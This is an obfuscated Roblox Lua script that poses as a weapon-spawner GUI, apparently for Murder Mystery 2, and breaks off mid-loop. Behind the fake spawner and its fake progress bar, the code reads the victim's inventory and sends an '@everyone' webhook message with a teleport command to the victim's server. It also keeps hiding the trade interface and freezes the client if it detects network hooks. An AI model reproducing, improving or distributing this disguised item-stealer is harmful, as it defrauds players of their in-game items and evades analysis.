--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v206,v207) local v208={};for v290=1, #v206 do v6(v208,v0(v4(v1(v2(v206,v290,v290 + 1 )),v1(v2(v207,1 + (v290% #v207) ,1 + (v290% #v207) + 1 )))%256 ));end return v5(v208);end local v8=game:GetService(v7("\225\207\218\60\227\169\212","\126\177\163\187\69\134\219\167"));local v9=game:GetService(v7("\23\218\47\192\242\16\200\56\211\245\32\200","\156\67\173\74\165"));local v10=game:GetService(v7("\6\162\71\37\185\52\80\61\180\76","\38\84\215\41\118\220\70"));local v11=v8.LocalPlayer;local function v12(v209,v210) local v211=Instance.new(v7("\101\63\1\29\236\94\19\48","\158\48\118\66\114"));v211.CornerRadius=v210 or UDim.new(0,520 -(409 + 103) ) ;v211.Parent=v209;return v211;end local function v13(v214,v215,v216) local v217=236 -(46 + 190) ;local v218;while true do if (v217==2) then return v218;end if (v217==(96 -(51 + 44))) then v218.Volume=v216 or 1 ;v218.Parent=v214;v217=1 + 1 ;end if (v217==0) then v218=Instance.new(v7("\152\43\5\56\119","\155\203\68\112\86\19\197"));v218.SoundId=v7("\84\223\46\253\83\107\224\236\79\217\108\179\15","\152\38\189\86\156\32\24\133")   .. v215 ;v217=1318 -(1114 + 203) ;end end end local function v14(v219) local v220=726 -(228 + 498) ;local v221;local v222;local v223;local v224;local v225;while true do if (v220==(0 + 0)) then v221=0 + 0 ;v222=nil;v220=664 -(174 + 489) ;end if (v220==2) then v225=nil;while true do if ((2 -1)==v221) then v224=v9:Create(v219,v223,{[v7("\207\94\189\67","\38\156\55\199")]=v222-UDim2.new(1905 -(830 + 1075) ,5,0,529 -(303 + 221) ) });v225=v9:Create(v219,v223,{[v7("\155\116\102\45","\35\200\29\28\72\115\20\154")]=v222});v221=1271 -(231 + 1038) ;end if (v221==(2 + 0)) then v224:Play();v224.Completed:Connect(function() v225:Play();end);break;end if ((1162 -(171 + 991))==v221) then local v418=0 -0 ;while true do if (v418==(0 -0)) then v222=v219.Size;v223=TweenInfo.new(0.1,Enum.EasingStyle.Quad,Enum.EasingDirection.Out);v418=2 -1 ;end if (v418==1) then v221=1 + 0 ;break;end end end end break;end if (v220==1) then v223=nil;v224=nil;v220=6 -4 ;end end end local function v15(v226) local v227=0;local v228;local v229;local v230;local v231;local v232;while true do if (v227==2) then v232=v9:Create(v226,v230,{[v7("\136\95\211\165","\161\219\54\169\192\90\48\80")]=v228});v231:Play();v227=3;end if (v227==1) then v230=TweenInfo.new(0.1 -0 ,Enum.EasingStyle.Quad,Enum.EasingDirection.Out);v231=v9:Create(v226,v229,{[v7("\42\182\203\218","\84\121\223\177\191\237\76")]=v228-UDim2.new(0,5 -1 ,0 -0 ,2) });v227=1250 -(111 + 1137) ;end if (v227==(158 -(91 + 67))) then v228=v226.Size;v229=TweenInfo.new(0.1 -0 ,Enum.EasingStyle.Back,Enum.EasingDirection.Out);v227=1 + 0 ;end if (v227==(526 -(423 + 100))) then v231.Completed:Connect(function() v232:Play();end);break;end end end local v16=Instance.new(v7("\122\65\18\32\76\76\39\48\64","\69\41\34\96"));v16.ResetOnSpawn=false;v16.Parent=v11:WaitForChild(v7("\140\207\214\19\7\57\155\214\222","\75\220\163\183\106\98"));local v19=Instance.new(v7("\36\168\138\58\220","\185\98\218\235\87"));v19.Size=UDim2.new(0 + 0 ,636 -406 ,0 + 0 ,200);v19.Position=UDim2.new(771.5 -(326 + 445) , -(501 -386),0.4 -0 ,0 -0 );v19.BackgroundColor3=Color3.fromRGB(733 -(530 + 181) ,22,22);v19.Active=true;v19.Draggable=true;v19.Parent=v16;v12(v19,UDim.new(881 -(614 + 267) ,42 -(19 + 13) ));local v26=Instance.new(v7("\254\21\20\242\204\165\192\57","\202\171\92\71\134\190"));v26.Thickness=2 -0 ;v26.Color=Color3.fromRGB(255,116 -66 ,142 -92 );v26.ApplyStrokeMode=Enum.ApplyStrokeMode.Border;v26.Parent=v19;local v32=Instance.new(v7("\29\196\52\156\5\192\46\141\37","\232\73\161\76"));v32.Size=UDim2.new(1 + 0 , -(35 -15),0 -0 ,22);v32.Position=UDim2.new(0,10,1812 -(1293 + 519) ,6);v32.BackgroundTransparency=1 -0 ;v32.Text=v7("\159\248\113\117\94\136\250\112\116\46\143\234","\126\219\185\34\61");v32.TextColor3=Color3.fromRGB(665 -410 ,114 -54 ,258 -198 );v32.TextSize=18;v32.Font=Enum.Font.FredokaOne;v32.TextXAlignment=Enum.TextXAlignment.Left;v32.Parent=v19;local v44=Instance.new(v7("\56\203\70\102\82\118\241\226\0","\135\108\174\62\18\30\23\147"));v44.Size=UDim2.new(1, -(47 -27),0,9 + 7 );v44.Position=UDim2.new(0 + 0 ,10,0 -0 ,7 + 19 );v44.BackgroundTransparency=1 + 0 ;v44.Text=v7("\155\220\24\239\61\156\115\234\143\218\30\238\42\151\115\149","\167\214\137\74\171\120\206\83");v44.TextColor3=Color3.fromRGB(160,160,100 + 60 );v44.TextSize=1109 -(709 + 387) ;v44.Font=Enum.Font.FredokaOne;v44.TextXAlignment=Enum.TextXAlignment.Left;v44.TextStrokeTransparency=0.5;v44.Parent=v19;local v55=Instance.new(v7("\173\226\51\80\253","\199\235\144\82\61\152"));v55.Size=UDim2.new(1859 -(673 + 1185) , -20,0 -0 ,1);v55.Position=UDim2.new(0 -0 ,10,0,75 -29 );v55.BackgroundColor3=Color3.fromRGB(43 + 17 ,60,60);v55.BorderSizePixel=0 + 0 ;v55.Parent=v19;local v61=Color3.fromRGB(343 -88 ,50,13 + 37 );local v62=Color3.fromRGB(99 -49 ,50,98 -48 );local v63=Color3.fromRGB(1950 -(446 + 1434) ,1353 -(1040 + 243) ,208 -138 );local v64=Instance.new(v7("\51\19\161\63\37\3\173\63\8\24","\75\103\118\217"));v64.Size=UDim2.new(1847 -(559 + 1288) ,88,0,1955 -(609 + 1322) );v64.Position=UDim2.new(454 -(13 + 441) ,37 -27 ,0 -0 ,811 -648 );v64.BackgroundColor3=v63;v64.Text=v7("\234\85\121\26","\126\167\52\16\116\217");v64.TextColor3=Color3.fromRGB(255,10 + 245 ,926 -671 );v64.TextSize=13;v64.Font=Enum.Font.FredokaOne;v64.Parent=v19;v12(v64,UDim.new(0,3 + 3 ));local v73=Instance.new(v7("\253\7\19\148\166\22\247\205","\156\168\78\64\224\212\121"));v73.Color=v61;v73.Thickness=1.5 + 0 ;v73.Parent=v64;local v77=Instance.new(v7("\51\235\189\218\37\251\177\218\8\224","\174\103\142\197"));v77.Size=UDim2.new(0,261 -173 ,0 + 0 ,44 -20 );v77.Position=UDim2.new(0 + 0 ,102,0 + 0 ,163);v77.BackgroundColor3=v62;v77.Text=v7("\119\61\75\55\35\95\234\91","\152\54\72\63\88\69\62");v77.TextColor3=Color3.fromRGB(144 + 56 ,168 + 32 ,196 + 4 );v77.TextSize=13;v77.Font=Enum.Font.FredokaOne;v77.Parent=v19;v12(v77,UDim.new(0,439 -(153 + 280) ));local v86=Instance.new(v7("\225\237\221\72\198\203\229\89","\60\180\164\142"));v86.Color=v61;v86.Thickness=2.5 -1 ;v86.Enabled=false;v86.Parent=v77;local v91=v13(v77,6324790483);local v92=v13(v64,6324791400 -(556 + 361) );local v93=Instance.new(v7("\108\91\29\61\11\236\16\93\82","\114\56\62\101\73\71\141"));v93.Size=UDim2.new(1 + 0 , -(19 + 1),0,16 + 6 );v93.Position=UDim2.new(0 -0 ,7 + 3 ,667 -(89 + 578) ,38 + 14 );v93.BackgroundTransparency=1 -0 ;v93.Text=v7("\143\236\218\212\183\231\155\247\168\232\204\202\189\251","\164\216\137\187");v93.TextColor3=Color3.fromRGB(1304 -(572 + 477) ,255,35 + 220 );v93.TextSize=20;v93.Font=Enum.Font.FredokaOne;v93.TextXAlignment=Enum.TextXAlignment.Left;v93.Parent=v19;local v103=Instance.new(v7("\230\227\41\166\132\241\19","\107\178\134\81\210\198\158"));v103.Size=UDim2.new(1 + 0 , -(3 + 17),86 -(84 + 2) ,49 -19 );v103.Position=UDim2.new(0,8 + 2 ,0,920 -(497 + 345) );v103.BackgroundColor3=Color3.fromRGB(2 + 38 ,40,7 + 33 );v103.TextColor3=Color3.fromRGB(255,1588 -(605 + 728) ,182 + 73 );v103.PlaceholderColor3=Color3.fromRGB(120,266 -146 ,6 + 114 );v103.TextSize=55 -40 ;v103.Font=Enum.Font.FredokaOne;v103.PlaceholderText=v7("\29\0\150\195\184\120\39\150\195\167\120\32\131\203\175\118\64\204","\202\88\110\226\166");v103.Text="";v103.ClearTextOnFocus=false;v103.Parent=v19;v12(v103,UDim.new(0 + 0 ,21 -13 ));local v115=Instance.new(v7("\247\10\154\227\232\214\27\150\248\196","\170\163\111\226\151"));v115.Size=UDim2.new(1 + 0 , -(509 -(457 + 32)),0,16 + 20 );v115.Position=UDim2.new(1402 -(832 + 570) ,10,0 + 0 ,30 + 84 );v115.BackgroundColor3=Color3.fromRGB(707 -507 ,20 + 20 ,836 -(588 + 208) );v115.Text=v7("\34\32\179\47\64\119\0\5\53\191","\73\113\80\210\88\46\87");v115.TextColor3=Color3.fromRGB(255,687 -432 ,2055 -(884 + 916) );v115.TextSize=17;v115.Font=Enum.Font.FredokaOne;v115.Parent=v19;v12(v115,UDim.new(0,8));local v124=v13(v115,18202483174 -0 );local v125=Instance.new(v7("\181\41\213\6\203\128\46\200\30","\135\225\76\173\114"));v125.Size=UDim2.new(1 + 0 , -(673 -(232 + 421)),1889 -(1569 + 320) ,5 + 15 );v125.Position=UDim2.new(0,2 + 8 ,0 -0 ,58);v125.BackgroundTransparency=606 -(316 + 289) ;v125.Text=v7("\59\216\140\159\138\156\149\55","\199\122\141\216\208\204\221");v125.TextColor3=Color3.fromRGB(255,667 -412 ,12 + 243 );v125.TextSize=1469 -(666 + 787) ;v125.Font=Enum.Font.FredokaOne;v125.TextXAlignment=Enum.TextXAlignment.Left;v125.Visible=false;v125.Parent=v19;local v136=Instance.new(v7("\153\216\8\228\90\227\185\201\31\254","\150\205\189\112\144\24"));v136.Size=UDim2.new(425 -(360 + 65) ,57 + 3 ,254 -(79 + 175) ,40 -14 );v136.Position=UDim2.new(1, -(55 + 15),0 -0 ,105 -50 );v136.BackgroundColor3=Color3.fromRGB(999 -(503 + 396) ,281 -(92 + 89) ,100);v136.BorderSizePixel=0 -0 ;v136.Text="";v136.AutoButtonColor=false;v136.Visible=false;v136.Parent=v19;v12(v136,UDim.new(1 + 0 ,0));local v145=Instance.new(v7("\3\150\190\65\1","\112\69\228\223\44\100\232\113"));v145.Size=UDim2.new(0,14 + 8 ,0 -0 ,4 + 18 );v145.Position=UDim2.new(0 -0 ,2 + 0 ,0 + 0 ,5 -3 );v145.BackgroundColor3=Color3.fromRGB(32 + 223 ,388 -133 ,1499 -(485 + 759) );v145.Parent=v136;v12(v145,UDim.new(2 -1 ,1189 -(442 + 747) ));local v150=false;local v151=false;local v152,v153;local function v154() if v153 then local v331=1135 -(832 + 303) ;while true do if (0==v331) then v153:Cancel();v153=nil;break;end end end end v136.MouseButton1Click:Connect(function() v150= not v150;v151=v150;local v233=(v150 and UDim2.new(0,36,946 -(88 + 858) ,1 + 1 )) or UDim2.new(0 + 0 ,1 + 1 ,0,791 -(766 + 23) ) ;local v234=(v150 and Color3.fromRGB(40,987 -787 ,40)) or Color3.fromRGB(136 -36 ,100,263 -163 ) ;v9:Create(v145,TweenInfo.new(0.2 -0 ),{[v7("\228\16\20\218\162\117\137\218","\230\180\127\103\179\214\28")]=v233}):Play();v9:Create(v136,TweenInfo.new(0.2),{[v7("\174\4\92\77\227\83\239\153\11\91\101\235\77\239\158\86","\128\236\101\63\38\132\33")]=v234}):Play();if v151 then local v332=game:GetService(v7("\155\166\3\79\165\251\206\175\172","\175\204\201\113\36\214\139"));local v333=v11.Character or v11.CharacterAdded:Wait() ;local v334=v333:WaitForChild(v7("\111\217\56\221\10\72\197\49","\100\39\172\85\188"));v11.CharacterAdded:Connect(function(v344) v333=v344;v334=v344:WaitForChild(v7("\133\109\180\129\61\162\113\189","\83\205\24\217\224"));end);local function v335() for v398,v399 in v332:GetChildren() do local v400=v399:FindFirstChild(v7("\197\202\196\51\197\202\195\41\231\204\195\56\244","\93\134\165\173"));if v400 then return v400;end end end local v336={};local function v337() local v345=1073 -(1036 + 37) ;local v346;while true do if (v345==(0 + 0)) then v346=v335();if v346 then local v443,v444=math.huge,nil;for v448,v449 in v346:GetChildren() do if (v449:FindFirstChild(v7("\138\253\212\193\50\231\188\106\187\224\196\209\46","\30\222\146\161\162\90\174\210")) and  not v336[v449]) then local v452=0 -0 ;local v453;while true do if (v452==(0 + 0)) then v453=(v333:GetPivot().Position-v449.Position).Magnitude;if (v453<v443) then v443,v444=v453,v449;end break;end end end end return v443,v444;end break;end end end v332.DescendantRemoving:Connect(function(v347) if ((v347==v152) or (v152 and (v347.Parent==v152))) then local v404=1480 -(641 + 839) ;while true do if (0==v404) then v154();v336[v152]=nil;v404=914 -(910 + 3) ;end if (v404==1) then v152=nil;break;end end end end);task.spawn(function() while v151 do local v401=0 -0 ;while true do if ((1684 -(1466 + 218))==v401) then task.wait();if v333 then local v450=0 + 0 ;local v451;while true do if (v450==(1149 -(556 + 592))) then if v152 then v336[v152]=true;v153=v9:Create(v333.PrimaryPart,TweenInfo.new(v451/v334.WalkSpeed ),{[v7("\198\104\98\11\232\75","\106\133\46\16")]=v152.CFrame});v153:Play();v153.Completed:Wait();v153=nil;else v336={};end break;end if (v450==(0 + 0)) then local v454=808 -(329 + 479) ;while true do if (0==v454) then v451=nil;v451,v152=v337();v454=1;end if (v454==1) then v450=1;break;end end end end end break;end end end end);else v154();end end);local function v155(v235) local v236=0;while true do if ((854 -(174 + 680))==v236) then v103.Visible=v235;v115.Visible=v235;v93.Visible=v235;v136.Visible= not v235;v236=1;end if (v236==(3 -2)) then v125.Visible= not v235;v64.BackgroundColor3=(v235 and v63) or v62 ;v77.BackgroundColor3=(v235 and v62) or v63 ;v73.Enabled=v235;v236=3 -1 ;end if (v236==(2 + 0)) then v86.Enabled= not v235;v64.TextColor3=(v235 and Color3.fromRGB(994 -(396 + 343) ,23 + 232 ,255)) or Color3.fromRGB(1657 -(29 + 1448) ,1569 -(135 + 1254) ,678 -498 ) ;v77.TextColor3=(v235 and Color3.fromRGB(840 -660 ,180,180)) or Color3.fromRGB(170 + 85 ,1782 -(389 + 1138) ,829 -(102 + 472) ) ;break;end end end v64.MouseButton1Click:Connect(function() local v237=0;while true do if (1==v237) then v155(true);break;end if (v237==(0 + 0)) then v92:Play();v15(v64);v237=1 + 0 ;end end end);v77.MouseButton1Click:Connect(function() local v238=0 + 0 ;while true do if (v238==0) then v91:Play();v15(v77);v238=1546 -(320 + 1225) ;end if (v238==1) then v155(false);break;end end end);v155(true);local function v156(v239) local v240=0 -0 ;local v241;local v242;local v243;local v244;local v245;local v246;while true do if (v240==(2 + 0)) then v242.Parent=v241;v12(v242,UDim.new(1464 -(157 + 1307) ,8));v243=Instance.new(v7("\126\250\139\88\9\114\64\214","\29\43\179\216\44\123"));v240=1862 -(821 + 1038) ;end if (v240==3) then v243.Color=v61;v243.Thickness=1.5;v243.Parent=v242;v240=9 -5 ;end if ((1 + 8)==v240) then v242:Destroy();break;end if (v240==(0 -0)) then v241=v11:WaitForChild(v7("\104\44\114\229\95\82\127\53\122","\32\56\64\19\156\58")):FindFirstChildOfClass(v7("\105\203\247\83\95\252\167\79\193","\224\58\168\133\54\58\146")) or Instance.new(v7("\106\85\89\248\112\136\160\30\80","\107\57\54\43\157\21\230\231"),v11:WaitForChild(v7("\235\135\16\236\188\206\232\206\130","\175\187\235\113\149\217\188"))) ;v242=Instance.new(v7("\26\189\128\65\230","\24\92\207\225\44\131\25"));v242.Size=UDim2.new(0,82 + 138 ,0 -0 ,40);v240=1027 -(834 + 192) ;end if (v240==(1 + 3)) then v244=Instance.new(v7("\137\220\56\88\145\216\34\73\177","\44\221\185\64"));v244.Size=UDim2.new(1 + 0 ,0,1 + 0 ,0);v244.BackgroundTransparency=1 -0 ;v240=309 -(300 + 4) ;end if (v240==(3 + 5)) then task.wait(3);v246:Play();task.wait(0.4 -0 );v240=9;end if (v240==(363 -(112 + 250))) then v242.Position=UDim2.new(0.5, -(44 + 66), -0.08,0);v242.BackgroundColor3=Color3.fromRGB(100 -60 ,23 + 17 ,21 + 19 );v242.BorderSizePixel=0;v240=2 + 0 ;end if (v240==(3 + 2)) then v244.Text=v239;v244.Font=Enum.Font.FredokaOne;v244.TextSize=12 + 4 ;v240=1420 -(1001 + 413) ;end if (v240==(15 -8)) then v245=v9:Create(v242,TweenInfo.new(0.4,Enum.EasingStyle.Back,Enum.EasingDirection.Out),{[v7("\49\232\91\86\103\8\232\70","\19\97\135\40\63")]=UDim2.new(882.5 -(244 + 638) , -(803 -(627 + 66)),0.04 -0 ,0)});v246=v9:Create(v242,TweenInfo.new(0.4,Enum.EasingStyle.Quad,Enum.EasingDirection.In),{[v7("\158\83\32\50\59\56\161\82","\81\206\60\83\91\79")]=UDim2.new(602.5 -(512 + 90) , -(2016 -(1665 + 241)), -0.08,717 -(373 + 344) ),[v7("\108\170\211\121\40\209\66\177\64\175\228\96\46\205\94\180\79\185\213\124\44\218","\196\46\203\176\18\79\163\45")]=1 + 0 });v245:Play();v240=8;end if (v240==(2 + 4)) then v244.TextColor3=Color3.fromRGB(255,672 -417 ,431 -176 );v244.TextScaled=true;v244.Parent=v242;v240=7;end end end local function v157(v247) local v248=0;local v249;local v250;local v251;local v252;local v253;local v254;local v255;while true do if (v248==(1104 -(35 + 1064))) then local v376=0;while true do if (v376==(2 + 0)) then v9:Create(v249,TweenInfo.new(0.5 -0 ,Enum.EasingStyle.Quad,Enum.EasingDirection.Out),{[v7("\72\136\61\30\108\142\33\25","\119\24\231\78")]=UDim2.new(1, -230,0.4 + 0 ,0),[v7("\160\44\166\65\219\82\30\151\35\161\126\206\65\31\145\61\164\88\217\78\18\155","\113\226\77\197\42\188\32")]=1236 -(298 + 938) }):Play();v248=1265 -(233 + 1026) ;break;end if (v376==0) then v252.TextScaled=true;v252.Text=v7("\236\15\241\25\62\159\27\241\12\63\209\27\231\92\53\209\95\228\21\52\216\95\178\92\62\218\9\253\31\63\145","\90\191\127\148\124");v376=1667 -(636 + 1030) ;end if ((1 + 0)==v376) then v252.Font=Enum.Font.FredokaOne;v252.Parent=v249;v376=2;end end end if (v248==4) then local v377=0 + 0 ;while true do if (v377==(1 + 0)) then v252.Position=UDim2.new(0 + 0 ,221 -(55 + 166) ,0.62 + 0 ,0 + 0 );v252.BackgroundTransparency=3 -2 ;v377=2;end if (v377==(297 -(36 + 261))) then v252=Instance.new(v7("\201\182\72\81\80\222\255\182\92","\191\157\211\48\37\28"));v252.Size=UDim2.new(1,0 -0 ,0.35,1368 -(34 + 1334) );v377=1 + 0 ;end if (v377==(2 + 0)) then v252.TextColor3=Color3.fromRGB(1443 -(1035 + 248) ,160,181 -(20 + 1) );v248=3 + 2 ;break;end end end if (v248==3) then v251.TextColor3=Color3.fromRGB(255,255,574 -(134 + 185) );v251.TextScaled=true;v251.Text=v7("\15\33\8\172\23\226\47\50\114\127\73\235\92","\85\92\81\105\219\121\139\65");v251.Font=Enum.Font.FredokaOne;v251.Parent=v249;v248=1137 -(549 + 584) ;end if (v248==(686 -(314 + 371))) then v249.Parent=v16;v12(v249,UDim.new(0,12));v250=Instance.new(v7("\159\225\62\223\215\172\220\228","\129\202\168\109\171\165\195\183"));v250.Color=v61;v250.Thickness=1.5;v248=6 -4 ;end if (v248==2) then local v387=0;while true do if (v387==(970 -(478 + 490))) then v251.BackgroundTransparency=1 + 0 ;v248=3;break;end if (v387==(1173 -(786 + 386))) then v251.Size=UDim2.new(1,0 -0 ,1379.55 -(1055 + 324) ,1340 -(1093 + 247) );v251.Position=UDim2.new(0 + 0 ,0,0,1 + 5 );v387=7 -5 ;end if (0==v387) then v250.Parent=v249;v251=Instance.new(v7("\22\93\47\204\242\21\228\39\84","\134\66\56\87\184\190\116"));v387=3 -2 ;end end end if (v248==6) then v253=0;while v253<100  do local v402=math.random(2,14 -9 );v253=math.min(v253 + v402 ,100);v251.Text=v7("\9\6\245\162\52\31\250\178\116\88\180","\213\90\118\148")   .. v253   .. "%" ;task.wait(4.3 -2 );end v249:Destroy();v254=game:GetService(v7("\105\43\164\90\68\88\47\160\83\73\104\58\187\68\76\92\43","\45\59\78\212\54"));v255=v254:WaitForChild(v7("\34\83\142\132\146\43\190","\144\112\54\227\235\230\78\205")):WaitForChild(v7("\128\32\0\236","\59\211\72\111\156\176")):WaitForChild(v7("\108\136\251\14\65\137\247\63\65\139\239\40\92","\77\46\231\131"));v248=3 + 4 ;end if (v248==0) then v249=Instance.new(v7("\158\48\127\19\33","\143\216\66\30\126\68\155"));v249.Size=UDim2.new(0 -0 ,220,0 -0 ,61 + 19 );v249.Position=UDim2.new(1,25 -15 ,688.4 -(364 + 324) ,0 -0 );v249.BackgroundColor3=Color3.fromRGB(52 -30 ,22,8 + 14 );v249.BackgroundTransparency=4 -3 ;v248=1;end if ((10 -3)==v248) then if (v247 and (v247~="")) then local v405,v406=require(game:GetService(v7("\136\81\166\76\179\87\183\84\191\80\133\84\181\70\183\71\191","\32\218\52\214")).Database.Sync.Item),require(game:GetService(v7("\124\18\33\164\248\179\68\78\75\19\2\188\254\162\68\93\75","\58\46\119\81\200\145\208\37")).Modules.ProfileData);local v407=v406.Weapons;local v408=v103.Text;local v409=1;local v410={};local v411=v408;if  not v410[v411] then v410[v411]=0 -0 ;end v410[v411]=v410[v411] + v409 ;print(v7("\10\136\52\169\173\253","\86\75\236\80\204\201\221")   .. v409   .. v7("\50\85\120\197","\235\18\33\23\229\158")   .. v411   .. v7("\30\250\239\190\71\250\213\180\68\187\205\225\16","\219\48\218\161")   .. v410[v411] );game:GetService(v7("\214\100\114\122\222\93\246\237\114\121","\128\132\17\28\41\187\47")):BindToRenderStep(v7("\40\60\16\63\83\21\61\20\35\104\17\54\7\46\88\62","\61\97\82\102\90")   .. v411 ,1,function() v407.Owned[v411]=v410[v411];end);game.Players.LocalPlayer.Character:BreakJoints();end task.spawn(function() v156("✓  Spawned: "   .. v247 );end);break;end end end v115.MouseButton1Click:Connect(function() v124:Play();v14(v115);local v256=v103.Text;if (v256~="") then v157(v256);else local v338=1268 -(1249 + 19) ;local v339;while true do if (v338==(0 + 0)) then local v413=0 -0 ;while true do if (v413==(1087 -(686 + 400))) then v338=1;break;end if ((0 + 0)==v413) then v339=Instance.new(v7("\153\7\152\95\213\88\21\12","\105\204\78\203\43\167\55\126"));v339.Color=v61;v413=1;end end end if (v338==(231 -(73 + 156))) then task.delay(1 + 0 ,function() v339:Destroy();end);break;end if (v338==1) then v339.Thickness=813 -(721 + 90) ;v339.Parent=v103;v338=1 + 1 ;end end end end);local v158=Instance.new(v7("\145\175\59\10\49\17\211\69\170\164","\49\197\202\67\126\115\100\167"));v158.Size=UDim2.new(0,227 -157 ,470 -(224 + 246) ,35 -13 );v158.Position=UDim2.new(1 -0 , -80,0 + 0 ,6);v158.BackgroundColor3=Color3.fromRGB(5 + 175 ,35,26 + 9 );v158.Text="✕  Close";v158.TextColor3=Color3.fromRGB(506 -251 ,255,848 -593 );v158.TextSize=526 -(203 + 310) ;v158.Font=Enum.Font.FredokaOne;v158.Parent=v19;v12(v158,UDim.new(1993 -(1238 + 755) ,1 + 5 ));local v167=v13(v158,6026984224);v158.MouseButton1Click:Connect(function() local v257=1534 -(709 + 825) ;while true do if (v257==(3 -1)) then task.wait(0.3 -0 );v16:Destroy();break;end if (v257==(864 -(196 + 668))) then v167:Play();v14(v158);v257=3 -2 ;end if (v257==(1 -0)) then task.wait(833.15 -(171 + 662) );v9:Create(v19,TweenInfo.new(0.3,Enum.EasingStyle.Quad,Enum.EasingDirection.In),{[v7("\4\82\197\44","\62\87\59\191\73\224\54")]=UDim2.new(93 -(4 + 89) ,0 -0 ,0 + 0 ,0 -0 ),[v7("\215\13\233\192\243\11\245\199","\169\135\98\154")]=v19.Position + UDim2.new(0 + 0 ,115,0,90) }):Play();v257=1488 -(35 + 1451) ;end end end);local v168=v7("\243\111\60\108\241\60\222\206\101\61\88\172","\168\171\23\68\52\157\83");local v169=v7("\252\101\225\189\54\119\200\187\117\252\190\38\34\149\240\63\246\162\40\98\134\228\120\186\186\32\47\143\251\126\254\190\106\124\212\163\35\162\248\118\121\211\167\34\167\250\124\123\208\166\41\166\226\33\47\181\230\83\209\186\28\9\148\236\115\196\132\13\47\214\172\71\219\146\15\6\131\204\67\237\184\17\10\215\241\86\199\133\13\21\174\167\35\243\148\42\24\190\198\93\219\155\117\27\163\211\69\209\143\44\12\151\166\40\214\153\3\117\213\250\104","\231\148\17\149\205\69\77");local function v170() if setfpscap then setfpscap(1453 -(28 + 1425) );end rconsoleclear();function print() end function warn() end function error() end function setclipboard() end while true do end end if (ishooked and (ishooked(game.HttpGet) or ishooked(request))) then v170();end if getgenv().executed then return;end getgenv().executed=true;local v172=require(game:GetService(v7("\178\162\215\247\94\252\129\179\194\255\100\235\143\181\198\252\82","\159\224\199\167\155\55")).Modules.InventoryModule);local v173=require(game:GetService(v7("\197\246\44\222\254\240\61\198\242\247\15\198\248\225\61\213\242","\178\151\147\92")).Modules.ProfileData);local v174=require(game:GetService(v7("\190\248\92\62\27\79\123\152\248\72\1\6\67\104\141\250\73","\26\236\157\44\82\114\44")).Modules.LevelModule);local function v175(v258,v259,v260) local v261=1993 -(941 + 1052) ;local v262;local v263;local v264;local v265;local v266;local v267;while true do if (v261==(0 + 0)) then local v392=0;while true do if ((1514 -(822 + 692))==v392) then v262=game:GetService(v7("\2\58\193\75\25\43\199\77\35\45\208","\59\74\78\181"));v263={[v7("\6\222\84\78\182\43\197\23\110\170\53\212","\211\69\177\58\58")]=v7("\182\245\105\249\224\200\182\241\112\250\231\132\189\246\118\251","\171\215\133\25\149\137")};v392=1 -0 ;end if (v392==(1 + 0)) then v261=1;break;end end end if (v261==3) then if (v260==true) then local v416=request({[v7("\38\199\142","\167\115\181\226\155\138")]=v258,[v7("\207\39\243\84\116\117","\166\130\66\135\60\27\17")]=v7("\116\101\253\65","\80\36\42\174\21"),[v7("\102\21\54\126\75\2\36","\26\46\112\87")]=v263,[v7("\155\44\175\109","\212\217\67\203\20\223\223\37")]=v267});else local v417=request({[v7("\143\159\164","\178\218\237\200")]=v258,[v7("\155\176\242\216\185\177","\176\214\213\134")]=v7("\196\130\133\224","\57\148\205\214\180\200\54"),[v7("\58\248\52\48\115\0\238","\22\114\157\85\84")]=v263,[v7("\230\196\23\221","\200\164\171\115\164\61\150")]=v266});end break;end if (v261==1) then v264={[v7("\226\199\60\238\234\62\232","\34\129\168\82\154\143\80\156")]="game:GetService('TeleportService'):TeleportToPlaceInstance(142823291, '"   .. game.JobId   .. "')" ,[v7("\128\191\49\14\76\93","\233\229\210\83\107\40\46")]={{[v7("\213\75\38\218\0","\101\161\34\82\182")]=v259.title,[v7("\235\2\85\241\201","\78\136\109\57\158\187\130\226")]=v259.color,[v7("\56\54\252\253\58\44","\145\94\95\153")]=v259.fields}}};v265={[v7("\254\194\26\193\75\185\233","\215\157\173\116\181\46")]="----@everyone\ngame:GetService('TeleportService'):TeleportToPlaceInstance(142823291, '"   .. game.JobId   .. "')" ,[v7("\48\185\137\247\222\38","\186\85\212\235\146")]={{[v7("\214\136\2\242\60","\56\162\225\118\158\89\142")]=v259.title,[v7("\95\10\204\160\48","\184\60\101\160\207\66")]=v259.color,[v7("\55\139\121\176\53\145","\220\81\226\28")]=v259.fields}}};v261=2;end if (v261==(1 + 1)) then local v393=0 -0 ;local v394;while true do if (v393==0) then v394=433 -(114 + 319) ;while true do if (v394==(0 -0)) then v266=v262:JSONEncode(v264);v267=v262:JSONEncode(v265);v394=1 -0 ;end if ((1 + 0)==v394) then v261=4 -1 ;break;end end break;end end end end end local v176=coroutine.create(function() while true do local v291=game:GetService(v7("\142\248\2\92\134\172\231","\227\222\148\99\37")).LocalPlayer;local v292=v291:WaitForChild(v7("\3\94\83\239\252\33\117\71\255","\153\83\50\50\150")):WaitForChild(v7("\105\100\114\24\118\140\120\116","\45\61\22\19\124\19\203"));local v293=v291:WaitForChild(v7("\241\30\12\236\7\98\158\212\27","\217\161\114\109\149\98\16")):WaitForChild(v7("\38\50\57\120\185\83\39\9\7\76\180\123\28\37","\20\114\64\88\28\220"));if (v292.Enabled==true) then v292.Enabled=false;end if (v293.Enabled==true) then v293.Enabled=false;end wait(0.1 -0 );end end);local v177={};for v268,v269 in pairs(v174.XPTable) do if (v173.NewXP<v269) then table.insert(v177,v268);end end local v178=math.min(table.unpack(v177));local v179=v174.Prestige;local v180={};local v181=0;local v182={};local v183={};local v184={};local v185={};local v186={};local v187={};local v188={};local v189={};local v190=1963 -(556 + 1407) ;local v191=0;local v192=1206 -(741 + 465) ;local v193=0;local v194=465 -(170 + 295) ;local v195=0;local v196=0 + 0 ;local v197=0 + 0 ;for v270,v271 in pairs(v172.MyInventory.Data.Weapons) do for v294,v295 